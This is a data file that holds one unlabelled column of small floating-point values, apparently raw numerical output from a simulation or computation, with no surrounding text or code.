0.000161671
0.000161789
0.000172586
0.000174651
0.00016379
0.000174599
0.000163795
0.000161728
0.000157132
0.0001441
0.000157135
0.00014411
0.000157028
0.000155016
0.000144156
0.000146222
0.000157077
0.000155014
0.00014422
0.000157131
0.000144101
0.000157136
0.000144108
0.000157026
0.000155017
0.000146227
0.000144157
0.000155017
0.000157076
0.000144219
0.000161685
0.000174715
0.000174713
0.000161676
0.000161795
0.000172593
0.000174655
0.000163796
0.000174607
0.000163802
0.000161731
0.000161683
0.000174713
0.000174711
0.000161674
0.000157039
0.000155018
0.000144163
0.000146228
0.000157083
0.000155016
0.000144226
0.000157138
0.000144105
0.00015714
0.000144113
0.000157037
0.00015502
0.000146226
0.000144163
0.00015502
0.000157082
0.000144228
0.000157137
0.000144105
0.00015714
0.000144116
0.000174711
0.000174711
0.000162224
0.000161673
0.00016167
0.00017472
0.000161659
0.000144085
0.000157149
0.000156561
0.000144098
0.0001441
0.000157139
0.000157138
0.000144088
0.000157148
0.000161787
0.000172591
0.000174652
0.000163793
0.0001746
0.000163799
0.000161731
0.000161679
0.000174712
0.000174705
0.000161669
0.000161678
0.000174709
0.000174703
0.000161674
0.000157027
0.000155016
0.000146225
0.00014416
0.000155018
0.000157077
0.000144227
0.000157029
0.000155017
0.000146222
0.000144162
0.000155017
0.000157082
0.000144227
0.000157132
0.000144102
0.000157135
0.000144116
0.000157133
0.000144105
0.00015714
0.000144117
0.000174723
0.000161663
0.00017472
0.000161663
0.000156567
0.000144107
0.000144104
0.000157141
0.000157142
0.000144092
0.000157153
0.000144091
0.000157152
0.000139578
0.000126507
0.000139577
0.000126508
0.000139564
0.000139562
0.000127084
0.000126525
0.000126526
0.000108922
0.000122008
0.00010892
0.000122007
0.000121395
0.000108948
0.000108946
0.000121987
0.000121987
0.000126533
0.000139563
0.000139558
0.000126528
0.000126646
0.000139501
0.000137443
0.000128642
0.000139458
0.000126585
0.000128648
0.000126649
0.000139503
0.000137446
0.000128644
0.00013946
0.000126587
0.000128646
0.000121986
0.000108951
0.000121984
0.000108957
0.000121987
0.00010895
0.000121986
0.000108956
0.00012188
0.000119868
0.000109011
0.000111068
0.000121921
0.000119868
0.000109071
0.000121881
0.000119873
0.000109011
0.000111069
0.000121923
0.000119865
0.00010907
0.000139567
0.000139568
0.000127082
0.000126528
0.000126529
0.000139583
0.000126509
0.00010892
0.000122007
0.000121398
0.000108947
0.000108949
0.000121987
0.000121989
0.000108921
0.000122009
0.000126645
0.000139501
0.000137444
0.000128642
0.000139457
0.000126585
0.00012865
0.000126532
0.000139563
0.000139564
0.000126526
0.000126644
0.000137448
0.000139501
0.000128643
0.000139455
0.000128651
0.000126586
0.000121987
0.000108949
0.000121983
0.000108956
0.00012188
0.00011987
0.00010901
0.00011107
0.00012192
0.000119871
0.000109073
0.000121986
0.00010895
0.000121983
0.000108954
0.00012188
0.00011987
0.00011107
0.000109011
0.000119871
0.000121921
0.000109075
0.000126531
0.000139566
0.000139567
0.000126527
0.000126647
0.000137447
0.000139507
0.000128643
0.000139463
0.000128651
0.000126587
0.000126533
0.000139566
0.000139568
0.000126527
0.000121879
0.000119873
0.000109014
0.000111067
0.000121923
0.00011987
0.000109077
0.000121986
0.000108951
0.000121985
0.000108956
0.000121882
0.00011987
0.000111066
0.000109011
0.000119869
0.000121923
0.000109076
0.000121987
0.000108949
0.000121984
0.000108955
0.000139562
0.000139566
0.000127087
0.000126529
0.000126529
0.000139581
0.00012651
0.000108921
0.000122008
0.0001214
0.000108949
0.00010895
0.000121989
0.00012199
0.000108923
0.00012201
0.000126652
0.000137442
0.000139506
0.000128641
0.000139463
0.000128646
0.000126589
0.000126532
0.000139565
0.000139568
0.000126528
0.000126533
0.000139566
0.000139566
0.000126527
0.000121882
0.000119868
0.000111069
0.000109014
0.000119868
0.000121924
0.000109078
0.000121885
0.000119867
0.000111069
0.000109011
0.000119868
0.000121924
0.000109076
0.000121989
0.000108952
0.000121985
0.000108958
0.000121989
0.00010895
0.000121985
0.000108956
0.000139584
0.000126509
0.000139583
0.000126509
0.000121399
0.000108945
0.000108947
0.000121989
0.000121989
0.000108918
0.000122008
0.00010892
0.000122009
0.000104433
9.13197e-05
0.000104432
9.13199e-05
0.000104406
0.000104404
9.19263e-05
9.13616e-05
9.13612e-05
7.37031e-05
8.68621e-05
7.37048e-05
8.68627e-05
8.61977e-05
7.37772e-05
7.37803e-05
8.68173e-05
8.6818e-05
9.13624e-05
0.0001044
0.000104411
9.13659e-05
9.14966e-05
0.000104334
0.000102285
9.34824e-05
0.000104306
9.14347e-05
9.34806e-05
9.14919e-05
0.000104334
0.00010229
9.348e-05
0.000104307
9.14333e-05
9.34823e-05
8.68228e-05
7.37812e-05
8.68116e-05
7.37695e-05
8.68205e-05
7.37808e-05
8.68102e-05
7.37725e-05
8.67262e-05
8.47119e-05
7.38565e-05
7.58961e-05
8.67385e-05
8.47005e-05
7.39064e-05
8.67173e-05
8.47104e-05
7.3856e-05
7.58952e-05
8.67369e-05
8.47011e-05
7.39062e-05
0.000104405
0.000104405
9.19249e-05
9.13622e-05
9.13587e-05
0.000104432
9.13166e-05
7.37027e-05
8.68622e-05
8.61958e-05
7.37786e-05
7.37782e-05
8.68166e-05
8.6813e-05
7.37005e-05
8.68587e-05
9.149e-05
0.000104333
0.000102289
9.34807e-05
0.000104303
9.14354e-05
9.34852e-05
9.13639e-05
0.000104401
0.000104409
9.13691e-05
9.14909e-05
0.000102286
0.000104334
9.34809e-05
0.000104306
9.34832e-05
9.14366e-05
8.6826e-05
7.37834e-05
8.6812e-05
7.37745e-05
8.67226e-05
8.47113e-05
7.38589e-05
7.58964e-05
8.67384e-05
8.47048e-05
7.39151e-05
8.68243e-05
7.3785e-05
8.6813e-05
7.37795e-05
8.6719e-05
8.47103e-05
7.58959e-05
7.38615e-05
8.47045e-05
8.6739e-05
7.3915e-05
9.13602e-05
0.000104401
0.000104411
9.13637e-05
9.14858e-05
0.000102282
0.000104334
9.34786e-05
0.000104307
9.34788e-05
9.14329e-05
9.1358e-05
0.000104401
0.000104411
9.13639e-05
8.67166e-05
8.47102e-05
7.38584e-05
7.5894e-05
8.67352e-05
8.47037e-05
7.39151e-05
8.68176e-05
7.37819e-05
8.68077e-05
7.37726e-05
8.67098e-05
8.47081e-05
7.58972e-05
7.3855e-05
8.47059e-05
8.67343e-05
7.39107e-05
8.68135e-05
7.37784e-05
8.68065e-05
7.37702e-05
0.000104406
0.000104408
9.19245e-05
9.13637e-05
9.13625e-05
0.000104434
9.13196e-05
7.37041e-05
8.68643e-05
8.61943e-05
7.37802e-05
7.37796e-05
8.68195e-05
8.68172e-05
7.37036e-05
8.68619e-05
9.14856e-05
0.00010229
0.000104334
9.34803e-05
0.000104304
9.34846e-05
9.14325e-05
9.13552e-05
0.000104403
0.000104412
9.13664e-05
9.13578e-05
0.000104401
0.000104409
9.13649e-05
8.67181e-05
8.47113e-05
7.58974e-05
7.38597e-05
8.47074e-05
8.67379e-05
7.39168e-05
8.67181e-05
8.47089e-05
7.58956e-05
7.38542e-05
8.47032e-05
8.67355e-05
7.39119e-05
8.68155e-05
7.37833e-05
8.68102e-05
7.37723e-05
8.68146e-05
7.37793e-05
8.68085e-05
7.37702e-05
0.000104431
9.13156e-05
0.000104432
9.13163e-05
8.61917e-05
7.37758e-05
7.37754e-05
8.68141e-05
8.68148e-05
7.37001e-05
8.68578e-05
7.37e-05
8.68588e-05
6.93073e-05
5.60467e-05
6.93097e-05
5.60495e-05
6.92172e-05
6.92203e-05
5.67685e-05
5.62005e-05
5.62022e-05
3.81996e-05
5.1786e-05
3.81958e-05
5.17896e-05
5.09444e-05
3.8584e-05
3.85848e-05
5.15939e-05
5.15975e-05
5.61815e-05
6.92151e-05
6.92356e-05
5.61952e-05
5.63239e-05
6.91278e-05
6.71303e-05
5.83219e-05
6.91289e-05
5.62935e-05
5.83369e-05
5.63248e-05
6.91273e-05
6.71285e-05
5.83202e-05
6.91314e-05
5.62932e-05
5.83351e-05
5.16311e-05
3.85529e-05
5.16077e-05
3.8569e-05
5.16327e-05
3.85501e-05
5.16112e-05
3.85676e-05
5.1541e-05
4.95841e-05
3.87203e-05
4.09245e-05
5.14846e-05
4.96194e-05
3.87635e-05
5.15418e-05
4.95819e-05
3.87212e-05
4.09212e-05
5.14876e-05
4.96151e-05
3.87641e-05
6.9219e-05
6.92159e-05
5.67713e-05
5.61981e-05
5.61979e-05
6.93084e-05
5.60432e-05
3.82002e-05
5.17937e-05
5.09445e-05
3.85886e-05
3.85864e-05
5.15987e-05
5.15942e-05
3.82001e-05
5.17869e-05
5.63304e-05
6.91303e-05
6.71255e-05
5.83207e-05
6.91367e-05
5.62968e-05
5.8332e-05
5.6184e-05
6.92193e-05
6.92428e-05
5.61968e-05
5.63336e-05
6.7125e-05
6.91306e-05
5.83192e-05
6.9139e-05
5.8329e-05
5.6297e-05
5.16315e-05
3.85486e-05
5.16098e-05
3.85713e-05
5.15426e-05
4.95824e-05
3.87165e-05
4.09227e-05
5.14865e-05
4.96164e-05
3.87694e-05
5.16314e-05
3.85454e-05
5.1608e-05
3.85693e-05
5.15438e-05
4.9581e-05
4.09216e-05
3.87155e-05
4.96139e-05
5.14854e-05
3.87647e-05
5.61771e-05
6.92171e-05
6.92347e-05
5.61941e-05
5.63205e-05
6.71238e-05
6.91264e-05
5.83164e-05
6.91404e-05
5.83325e-05
5.62913e-05
5.61763e-05
6.92132e-05
6.92333e-05
5.61915e-05
5.15372e-05
4.95793e-05
3.87172e-05
4.09179e-05
5.14841e-05
4.96112e-05
3.87564e-05
5.16264e-05
3.85485e-05
5.1607e-05
3.85633e-05
5.15386e-05
4.95778e-05
4.09184e-05
3.87103e-05
4.96136e-05
5.14813e-05
3.87577e-05
5.16272e-05
3.85432e-05
5.16035e-05
3.85619e-05
6.92173e-05
6.92195e-05
5.67664e-05
5.62005e-05
5.61999e-05
6.93079e-05
5.60454e-05
3.81937e-05
5.17865e-05
5.09422e-05
3.85813e-05
3.85826e-05
5.15948e-05
5.15943e-05
3.81969e-05
5.17863e-05
5.63267e-05
6.71222e-05
6.91263e-05
5.83152e-05
6.91335e-05
5.83246e-05
5.62924e-05
5.61808e-05
6.92171e-05
6.92369e-05
5.61943e-05
5.61799e-05
6.92143e-05
6.92316e-05
5.61936e-05
5.15404e-05
4.95807e-05
4.09168e-05
3.87158e-05
4.961e-05
5.14831e-05
3.8766e-05
5.15444e-05
4.9577e-05
4.09141e-05
3.87172e-05
4.96071e-05
5.14844e-05
3.87592e-05
5.16304e-05
3.85482e-05
5.1607e-05
3.85682e-05
5.16313e-05
3.85469e-05
5.1607e-05
3.85656e-05
6.93048e-05
5.60424e-05
6.93051e-05
5.60439e-05
5.09386e-05
3.85801e-05
3.85838e-05
5.15911e-05
5.15927e-05
3.81922e-05
5.17826e-05
3.81955e-05
5.17852e-05
3.42702e-05
1.92079e-05
3.42654e-05
1.92041e-05
3.37548e-05
3.3755e-05
2.20251e-05
2.05587e-05
2.05514e-05
-7.66921e-06
1.59657e-05
-7.67797e-06
1.5976e-05
1.63771e-05
2.99246e-06
2.98687e-06
1.44458e-05
1.44431e-05
2.06523e-05
3.38668e-05
3.3934e-05
2.02269e-05
2.11685e-05
3.37152e-05
3.2462e-05
2.37866e-05
3.39419e-05
2.07242e-05
2.43054e-05
2.1167e-05
3.37186e-05
3.24608e-05
2.37838e-05
3.39411e-05
2.07178e-05
2.43046e-05
1.58739e-05
-3.51386e-07
1.47485e-05
4.69327e-06
1.58717e-05
-3.45871e-07
1.47411e-05
4.68408e-06
1.64947e-05
1.619e-05
3.98679e-06
1.09176e-05
1.49597e-05
1.69888e-05
6.34879e-06
1.64939e-05
1.61873e-05
3.99167e-06
1.09195e-05
1.49547e-05
1.69894e-05
6.34588e-06
3.3762e-05
3.37564e-05
2.20184e-05
2.05467e-05
2.05427e-05
3.42797e-05
1.9191e-05
-7.64795e-06
1.5951e-05
1.63731e-05
2.99988e-06
3.00107e-06
1.44395e-05
1.44401e-05
-7.66048e-06
1.59657e-05
2.11597e-05
3.37119e-05
3.24579e-05
2.37865e-05
3.39435e-05
2.07274e-05
2.4301e-05
2.06405e-05
3.38583e-05
3.39368e-05
2.02322e-05
2.11589e-05
3.24578e-05
3.37109e-05
2.37818e-05
3.39426e-05
2.42988e-05
2.07136e-05
1.58619e-05
-3.7394e-07
1.4751e-05
4.66324e-06
1.64828e-05
1.61892e-05
3.97626e-06
1.09124e-05
1.49547e-05
1.69842e-05
6.33169e-06
1.58622e-05
-3.87899e-07
1.47507e-05
4.66054e-06
1.64827e-05
1.61807e-05
1.09117e-05
3.9707e-06
1.69808e-05
1.49551e-05
6.32798e-06
2.06409e-05
3.38601e-05
3.39291e-05
2.02273e-05
2.11559e-05
3.24539e-05
3.37066e-05
2.37756e-05
3.39361e-05
2.42947e-05
2.07082e-05
2.06385e-05
3.38516e-05
3.39296e-05
2.02265e-05
1.64828e-05
1.61844e-05
3.98106e-06
1.09083e-05
1.4952e-05
1.69807e-05
6.33069e-06
1.58565e-05
-3.76765e-07
1.47367e-05
4.66173e-06
1.64808e-05
1.61771e-05
1.09057e-05
3.97436e-06
1.69771e-05
1.49419e-05
6.32704e-06
1.58566e-05
-3.85874e-07
1.47252e-05
4.66123e-06
3.37533e-05
3.3753e-05
2.20165e-05
2.05484e-05
2.05451e-05
3.42685e-05
1.92055e-05
-7.69227e-06
1.59687e-05
1.63693e-05
2.9786e-06
2.98402e-06
1.44392e-05
1.44285e-05
-7.68087e-06
1.59435e-05
2.11568e-05
3.24496e-05
3.371e-05
2.37724e-05
3.39388e-05
2.4291e-05
2.07137e-05
2.06433e-05
3.38571e-05
3.39357e-05
2.02313e-05
2.06432e-05
3.3855e-05
3.39335e-05
2.02349e-05
1.64824e-05
1.6178e-05
1.09036e-05
3.9681e-06
1.69736e-05
1.49469e-05
6.32401e-06
1.64806e-05
1.61783e-05
1.09032e-05
3.96853e-06
1.69744e-05
1.49433e-05
6.32213e-06
1.58605e-05
-3.90851e-07
1.47426e-05
4.65301e-06
1.58599e-05
-3.89419e-07
1.47307e-05
4.65148e-06
3.42618e-05
1.91993e-05
3.4266e-05
1.9204e-05
1.63653e-05
2.99136e-06
2.98201e-06
1.4428e-05
1.44302e-05
-7.68214e-06
1.59421e-05
-7.69662e-06
1.59555e-05
4.97294e-06
-1.90785e-06
4.96793e-06
-1.90917e-06
-4.52978e-07
-4.53984e-07
1.84215e-06
6.21294e-06
6.21554e-06
7.31985e-07
1.04066e-06
1.03756e-06
5.69308e-07
2.9664e-06
3.35404e-06
2.31158e-06
2.87002e-06
2.49455e-06
6.87519e-06
2.35794e-06
5.06564e-06
6.4821e-06
9.21823e-07
2.87046e-06
2.50916e-06
6.87736e-06
2.36295e-06
5.06412e-06
6.48624e-06
9.23674e-07
2.64825e-06
8.6111e-07
8.44514e-07
-1.76945e-07
2.64978e-06
8.6171e-07
8.46296e-07
-1.74239e-07
-4.40862e-07
-4.45392e-07
1.84505e-06
6.21388e-06
6.2192e-06
4.98586e-06
-1.89914e-06
7.28082e-07
1.03727e-06
1.04122e-06
2.87567e-06
2.48392e-06
6.87264e-06
2.35832e-06
5.05374e-06
6.4815e-06
9.17114e-07
5.77488e-07
2.92873e-06
3.34282e-06
2.31003e-06
2.87598e-06
6.87469e-06
2.50312e-06
2.36152e-06
5.05405e-06
9.15583e-07
6.48299e-06
2.65112e-06
8.61128e-07
8.45064e-07
-1.76958e-07
2.6508e-06
8.61603e-07
-1.75661e-07
8.44445e-07
2.32612e-06
7.20485e-06
7.20119e-06
6.16797e-06
7.34208e-06
3.34638e-06
3.34676e-06
2.32779e-06
7.20291e-06
7.20141e-06
6.17143e-06
7.34061e-06
3.34387e-06
3.34546e-06
2.32649e-06
7.1988e-06
7.19874e-06
6.17225e-06
7.3396e-06
3.3468e-06
3.3473e-06
6.57058e-07
2.33128e-06
1.32362e-06
1.32273e-06
6.55948e-07
2.33471e-06
1.32285e-06
1.32478e-06
6.567e-07
2.33454e-06
1.32164e-06
1.32356e-06
6.55428e-07
2.34051e-06
1.32458e-06
1.32217e-06
5.73625e-07
2.94957e-06
3.3391e-06
2.3163e-06
2.86976e-06
6.86499e-06
2.48318e-06
2.35461e-06
5.05185e-06
9.16421e-07
6.47238e-06
5.72512e-07
2.94068e-06
3.34003e-06
2.29672e-06
2.63492e-06
8.59104e-07
8.48641e-07
-1.73023e-07
2.64539e-06
8.62011e-07
-1.76705e-07
8.38243e-07
-4.61131e-07
-4.52855e-07
1.84488e-06
6.21908e-06
6.21727e-06
4.9732e-06
-1.90322e-06
7.26545e-07
1.03768e-06
1.04048e-06
2.87296e-06
6.86542e-06
2.48214e-06
2.35641e-06
5.05024e-06
9.18205e-07
6.47942e-06
5.66798e-07
2.93926e-06
3.33754e-06
2.31343e-06
5.72567e-07
2.94166e-06
3.33592e-06
2.30577e-06
2.63445e-06
8.61252e-07
-1.70449e-07
8.43444e-07
2.64677e-06
8.62875e-07
-1.71713e-07
8.46008e-07
4.97433e-06
-1.92064e-06
4.9858e-06
-1.90945e-06
7.30555e-07
1.03045e-06
1.03804e-06
-5.21329e-06
-5.21805e-06
-2.751e-06
1.19713e-06
-2.74306e-06
1.19606e-06
-5.21723e-06
-5.20861e-06
-2.73348e-06
1.19353e-06
-2.73462e-06
1.18486e-06
-2.7369e-06
1.20083e-06
-2.7345e-06
1.18748e-06
-5.21525e-06
-5.21257e-06
-2.75074e-06
1.19725e-06
-2.73871e-06
1.19807e-06
-5.22697e-06
-5.21454e-06
0.000728022
0.000728002
0.000723747
0.000723754
0.00072802
0.000728004
0.000723746
0.000732527
0.000736803
0.000732533
0.000736804
0.000732528
0.000732527
0.000732546
0.000736802
0.000736787
0.000736803
0.000732528
0.000732543
0.000728023
0.000723745
0.000728009
0.000728022
0.000723747
0.000732527
0.000728012
0.00072802
0.000727999
0.000723751
0.000723741
0.000728004
0.000728017
0.000723742
0.000732526
0.000736805
0.000732534
0.000736806
0.000732525
0.000732526
0.000732547
0.00073679
0.000736802
0.000736805
0.000732542
0.000732527
0.000728019
0.00072374
0.000728006
0.000728018
0.000723743
0.000732526
0.000728011
0.00072803
0.000723744
0.000723745
0.000728027
0.000728027
0.00072374
0.000727986
0.000723757
0.000728013
0.000723808
0.000727951
0.000728012
0.000723778
0.000727986
0.000723758
0.000728013
0.000723809
0.000727951
0.000728013
0.00072378
0.000692909
0.000692891
0.000688636
0.000688647
0.000692906
0.000692893
0.000688635
0.000697414
0.000701688
0.000697421
0.00070169
0.000697413
0.000697414
0.000697434
0.000701687
0.000701673
0.000701688
0.000697415
0.000697429
0.000692909
0.000688631
0.000692897
0.000692907
0.000688633
0.000697417
0.000692902
0.000692903
0.000692889
0.000688645
0.000688632
0.000692891
0.000692903
0.000688629
0.000697408
0.000701682
0.00069742
0.000701681
0.000697409
0.000697406
0.000697428
0.000701666
0.000701678
0.000701679
0.000697423
0.000697408
0.000692904
0.000688629
0.000692897
0.000692905
0.000688629
0.000697412
0.0006929
0.000692918
0.000688631
0.000688632
0.000692914
0.000692915
0.000688628
0.000697449
0.000701618
0.000701679
0.000697421
0.000701654
0.000697482
0.000697425
0.00069745
0.000701617
0.000701682
0.000697425
0.000701654
0.000697479
0.000697428
0.000697409
0.000701694
0.000701695
0.000701698
0.000697412
0.000697413
0.000692873
0.000688645
0.000692902
0.000688704
0.00069284
0.000692899
0.00068867
0.000692873
0.000688645
0.000692903
0.000688704
0.000692839
0.000692901
0.00068867
0.000657793
0.000657775
0.000653521
0.000653534
0.000657793
0.000657778
0.000653518
0.000662296
0.00066657
0.000662304
0.000666572
0.000662295
0.000662298
0.000662315
0.000666571
0.000666554
0.000666571
0.0006623
0.00066231
0.000657793
0.000653517
0.000657782
0.000657791
0.000653519
0.0006623
0.000657785
0.00065779
0.000657771
0.000653529
0.000653518
0.000657773
0.000657789
0.000653517
0.000662295
0.000666569
0.000662302
0.00066657
0.000662294
0.000662294
0.000662311
0.000666553
0.000666569
0.000666569
0.000662307
0.000662296
0.000657792
0.000653516
0.00065778
0.000657791
0.000653518
0.000662297
0.000657784
0.000657797
0.000653512
0.000653512
0.000657796
0.000657795
0.000653508
0.00066233
0.0006665
0.000666562
0.000662307
0.000666536
0.000662363
0.000662307
0.000662329
0.000666501
0.000666559
0.000662304
0.000666534
0.000662361
0.000662305
0.000662288
0.000666576
0.000666574
0.000666578
0.000662293
0.000662292
0.000657755
0.000653525
0.000657787
0.000653587
0.000657722
0.000657781
0.00065355
0.000657754
0.000653526
0.000657784
0.000653581
0.000657719
0.00065778
0.000653549
0.000622674
0.000622654
0.000618402
0.000618412
0.000622672
0.000622659
0.000618399
0.000627177
0.000631452
0.000627186
0.000631452
0.000627177
0.000627177
0.000627194
0.000631452
0.000631434
0.000631452
0.00062718
0.000627191
0.000622673
0.000618397
0.000622662
0.000622671
0.000618399
0.000627184
0.00062267
0.000622674
0.00062266
0.000618409
0.000618402
0.000622657
0.000622675
0.000618398
0.000627178
0.000631454
0.000627186
0.000631455
0.000627177
0.000627179
0.000627198
0.000631437
0.000631454
0.000631455
0.000627192
0.000627182
0.000622673
0.000618395
0.000622662
0.000622672
0.000618398
0.000627184
0.00062267
0.000622678
0.000618395
0.000618394
0.000622677
0.000622676
0.00061839
0.000627213
0.00063138
0.000631443
0.000627187
0.000631418
0.000627244
0.000627189
0.000627212
0.00063138
0.000631442
0.000627186
0.000631417
0.000627242
0.000627188
0.000627171
0.000631458
0.000631457
0.00063146
0.000627175
0.000627174
0.000622635
0.00061841
0.000622666
0.000618469
0.000622605
0.000622662
0.000618434
0.000622635
0.000618407
0.000622665
0.000618469
0.000622603
0.000622661
0.000618433
0.000587553
0.00058753
0.000583278
0.000583294
0.000587548
0.000587537
0.00058328
0.000592057
0.000596329
0.000592066
0.000596332
0.000592056
0.000592056
0.000592072
0.000596331
0.000596312
0.000596331
0.000592057
0.000592069
0.000587554
0.000583279
0.000587544
0.000587553
0.00058328
0.00059206
0.000587547
0.000587559
0.000587541
0.000583297
0.000583285
0.000587545
0.000587558
0.000583283
0.000592063
0.000596337
0.000592071
0.000596338
0.000592062
0.000592063
0.00059208
0.000596321
0.000596335
0.000596338
0.000592078
0.000592065
0.000587559
0.000583281
0.000587547
0.000587558
0.000583283
0.000592066
0.000587552
0.000587563
0.000583276
0.000583276
0.000587561
0.00058756
0.000583272
0.000592098
0.000596265
0.000596331
0.000592071
0.000596303
0.000592128
0.000592074
0.000592096
0.000596266
0.000596328
0.000592068
0.000596303
0.000592128
0.000592073
0.000592056
0.000596345
0.000596343
0.000596347
0.00059206
0.000592059
0.00058752
0.000583289
0.000587549
0.000583347
0.000587486
0.000587545
0.000583312
0.000587519
0.000583289
0.000587548
0.000583343
0.000587484
0.000587546
0.000583312
0.000552432
0.000552415
0.000548158
0.000548173
0.00055243
0.00055242
0.000548157
0.000556939
0.000561213
0.000556948
0.000561213
0.00055694
0.000556936
0.000556956
0.000561212
0.000561197
0.000561211
0.000556939
0.000556955
0.000552434
0.000548157
0.000552424
0.000552434
0.000548158
0.000556942
0.000552428
0.000552432
0.000552413
0.00054817
0.000548157
0.000552418
0.00055243
0.000548155
0.000556937
0.00056121
0.000556946
0.000561212
0.000556937
0.000556936
0.000556954
0.000561197
0.000561212
0.000561211
0.000556951
0.000556939
0.000552433
0.000548157
0.000552423
0.000552433
0.000548157
0.00055694
0.000552425
0.000552433
0.000548146
0.000548146
0.000552431
0.000552431
0.000548142
0.000556969
0.000561139
0.000561198
0.000556941
0.000561172
0.000557003
0.000556943
0.000556968
0.000561138
0.000561198
0.000556943
0.000561172
0.000557
0.000556943
0.000556925
0.000561212
0.000561213
0.000561215
0.000556929
0.000556929
0.000552393
0.00054816
0.000552421
0.000548221
0.000552361
0.000552416
0.000548187
0.000552392
0.00054816
0.000552422
0.000548219
0.000552357
0.000552417
0.000548184
0.0005173
0.000517281
0.000513025
0.000513037
0.000517297
0.000517284
0.000513024
0.000521806
0.000526082
0.000521815
0.000526084
0.000521805
0.000521806
0.000521822
0.000526082
0.000526064
0.000526083
0.000521807
0.000521818
0.000517301
0.000513022
0.000517287
0.000517298
0.000513023
0.000521808
0.000517292
0.000517298
0.000517282
0.000513031
0.000513019
0.000517283
0.000517294
0.00051302
0.000521807
0.000526084
0.000521814
0.000526084
0.000521807
0.000521805
0.000521824
0.000526068
0.000526081
0.000526083
0.00052182
0.000521805
0.000517299
0.00051302
0.000517288
0.000517299
0.000513021
0.000521811
0.000517294
0.000517301
0.000513013
0.000513014
0.000517298
0.000517299
0.000513009
0.000521836
0.000526008
0.000526069
0.000521809
0.000526043
0.000521869
0.000521812
0.000521837
0.000526007
0.00052607
0.000521812
0.000526043
0.000521867
0.000521814
0.000521795
0.000526082
0.000526083
0.000526086
0.000521798
0.000521799
0.000517257
0.000513026
0.000517288
0.000513084
0.000517224
0.000517284
0.000513049
0.000517258
0.000513027
0.000517289
0.000513083
0.000517223
0.000517285
0.000513049
0.000482159
0.000482142
0.000477884
0.000477893
0.000482159
0.000482141
0.000477882
0.000486666
0.000490943
0.000486675
0.000490945
0.000486666
0.000486668
0.000486686
0.000490944
0.000490928
0.000490946
0.00048667
0.000486681
0.00048216
0.00047788
0.000482148
0.000482159
0.000477882
0.00048667
0.000482152
0.00048216
0.000482144
0.000477894
0.000477885
0.000482144
0.000482159
0.000477883
0.000486666
0.000490944
0.000486673
0.000490945
0.000486665
0.000486666
0.000486685
0.000490928
0.000490944
0.000490945
0.00048668
0.000486669
0.000482159
0.000477878
0.000482147
0.000482158
0.000477881
0.000486671
0.000482155
0.000482164
0.000477875
0.000477877
0.00048216
0.000482162
0.000477873
0.000486698
0.000490869
0.000490931
0.000486672
0.000490905
0.00048673
0.000486674
0.000486699
0.000490871
0.000490932
0.000486674
0.000490907
0.000486732
0.000486675
0.000486657
0.000490945
0.000490946
0.000490949
0.00048666
0.000486661
0.00048212
0.000477888
0.000482149
0.000477946
0.000482086
0.000482146
0.000477912
0.00048212
0.000477892
0.000482152
0.000477947
0.000482088
0.000482147
0.000477913
0.000447019
0.000447001
0.000442742
0.000442756
0.000447016
0.000447006
0.000442741
0.000451524
0.0004558
0.000451533
0.000455801
0.000451525
0.000451525
0.000451541
0.000455799
0.000455785
0.000455801
0.000451525
0.000451541
0.000447019
0.000442741
0.000447007
0.000447018
0.000442741
0.000451528
0.000447012
0.000447016
0.000447
0.000442751
0.00044274
0.000447001
0.000447016
0.000442737
0.000451523
0.000455802
0.000451532
0.000455803
0.000451523
0.000451524
0.000451542
0.000455784
0.000455801
0.000455802
0.000451537
0.000451527
0.000447015
0.000442736
0.000447004
0.000447013
0.000442738
0.000451527
0.000447011
0.000447024
0.000442737
0.000442738
0.000447022
0.000447022
0.000442734
0.00045156
0.000455729
0.000455794
0.000451533
0.000455768
0.000451589
0.000451537
0.000451561
0.000455732
0.000455795
0.000451534
0.000455769
0.000451593
0.000451537
0.000451519
0.000455809
0.000455809
0.000455812
0.000451523
0.000451523
0.000446979
0.000442751
0.00044701
0.000442804
0.000446944
0.000447007
0.000442773
0.000446979
0.000442751
0.00044701
0.000442806
0.000446948
0.000447007
0.000442772
0.000411874
0.000411856
0.000407598
0.000407611
0.000411874
0.00041186
0.000407596
0.000416386
0.000420662
0.000416393
0.000420664
0.000416386
0.000416382
0.000416402
0.000420661
0.000420644
0.000420661
0.000416386
0.000416398
0.000411877
0.000407595
0.000411866
0.000411875
0.000407597
0.000416386
0.00041187
0.000411879
0.000411863
0.000407618
0.000407603
0.000411865
0.000411877
0.000407602
0.000416385
0.000420661
0.000416393
0.000420662
0.000416385
0.000416384
0.000416403
0.000420645
0.000420661
0.00042066
0.0004164
0.000416387
0.00041188
0.000407602
0.000411868
0.00041188
0.000407603
0.000416388
0.000411871
0.000411882
0.000407593
0.000407592
0.00041188
0.000411879
0.000407589
0.00041642
0.000420589
0.000420652
0.000416393
0.000420626
0.000416449
0.000416395
0.000416419
0.000420593
0.00042065
0.00041639
0.000420626
0.000416451
0.000416392
0.000416376
0.000420666
0.000420665
0.000420668
0.00041638
0.000416379
0.000411838
0.000407607
0.000411868
0.000407665
0.000411804
0.000411866
0.000407628
0.000411839
0.000407605
0.000411867
0.000407665
0.000411806
0.000411863
0.00040763
0.000376736
0.000376718
0.000372459
0.000372473
0.000376733
0.000376722
0.000372458
0.000381242
0.000385518
0.000381251
0.000385519
0.000381242
0.000381242
0.00038126
0.000385518
0.000385502
0.000385518
0.000381244
0.000381258
0.000376736
0.000372456
0.000376723
0.000376735
0.000372457
0.000381246
0.000376728
0.000376738
0.000376721
0.000372473
0.000372462
0.000376722
0.000376737
0.000372461
0.000381244
0.00038552
0.000381252
0.000385522
0.000381243
0.000381244
0.000381263
0.000385503
0.00038552
0.000385521
0.000381258
0.000381247
0.000376737
0.000372456
0.000376725
0.000376736
0.000372459
0.00038125
0.000376734
0.000376744
0.000372457
0.000372458
0.000376742
0.000376742
0.000372453
0.000381279
0.00038545
0.000385513
0.000381253
0.000385485
0.000381313
0.000381256
0.000381279
0.000385449
0.00038551
0.000381252
0.000385485
0.00038131
0.000381254
0.000381238
0.000385527
0.000385526
0.000385529
0.000381242
0.000381241
0.000376701
0.00037247
0.000376731
0.000372529
0.000376668
0.000376728
0.000372495
0.000376701
0.000372471
0.00037673
0.000372526
0.000376665
0.000376727
0.000372494
0.0003416
0.000341581
0.000337327
0.000337337
0.000341598
0.000341584
0.000337325
0.000346105
0.000350378
0.000346113
0.000350381
0.000346104
0.000346106
0.000346126
0.000350381
0.000350363
0.000350381
0.000346108
0.00034612
0.000341601
0.000337323
0.000341588
0.000341598
0.000337324
0.000346109
0.000341594
0.000341598
0.000341579
0.000337333
0.000337323
0.000341581
0.000341596
0.000337321
